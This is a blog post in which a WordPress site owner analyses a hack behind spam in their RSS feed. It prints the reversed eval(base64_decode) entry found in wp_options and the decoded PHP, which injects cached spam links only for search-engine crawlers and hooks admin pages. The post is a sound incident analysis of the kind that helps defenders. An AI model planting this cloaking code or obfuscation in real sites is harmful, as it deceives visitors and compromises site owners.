I found the immediate cause of the Google Reader spam problem, thanks to this thread.  It turns out that someone was able to get a hacked entry into the database (specifically, into the wp_options table).  The important parts of the entry look like this:

;))"==QfK0wOpcyMyEzbo [... lots more gibberish-looking stuff, which is actually base64_encode()'d stuff] J3byJXZ"(edoced_46esab(lave'

Now, read that backwards, and it says:

eval(base64_decode(" [gibberish] "));

After reversing and decoding the string of gibberish, we get the following code, which somehow gets injected into the rendering of the RSS:

("+(n[1]-1)+")<");
                arr[i].innerHTML=txt;
            }
            }
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script>';   
        }
    } }   
    add_action('admin_head','admin123');
    }
}

if(!function_exists('echo123')){ function echo123(){
    global $e123;
    if($e123) return;
    $txt=get_option('internal_links_cache');
    if($txt!="") echo base64_decode($txt);
} }
if(!function_exists('echo323')){ function echo323($c){
    global $e123;
    if($e123) return;
    $e123=true;
    $txt=get_option('internal_links_cache');
    if($txt!="") return base64_decode($txt).$c;
    return $c;
} }
if(preg_match("/bot|google|slurp|bing|msn|charlotte|crawl|yahoo|search|spider|inktomi|ask|alexa|seek/",$_SERVER["HTTP_USER_AGENT"])&&sizeof($_COOKIE)==0){
    add_action('the_content','echo323');
    add_action('wp_footer','echo123');
}

Reading the parameter into the preg_match() function, now I see why the spam appeared in Google Reader but not Bloglines.  Here’s what I don’t know:

• Who did this?
• How did this get into the database in the first place?
• How does that reversed code get un-reversed so that it can get evaluated and run?
• How do I prevent this stuff from happening again?

I will be following the thread to see what other solutions people are able to come up with, or if anyone is able to track the crackers down.  Please leave comments here or there if you are able to figure anything else out.  Thanks.

(Don’t forget what started this all — we’re playing a gig in Lindenhurst on August 14th!)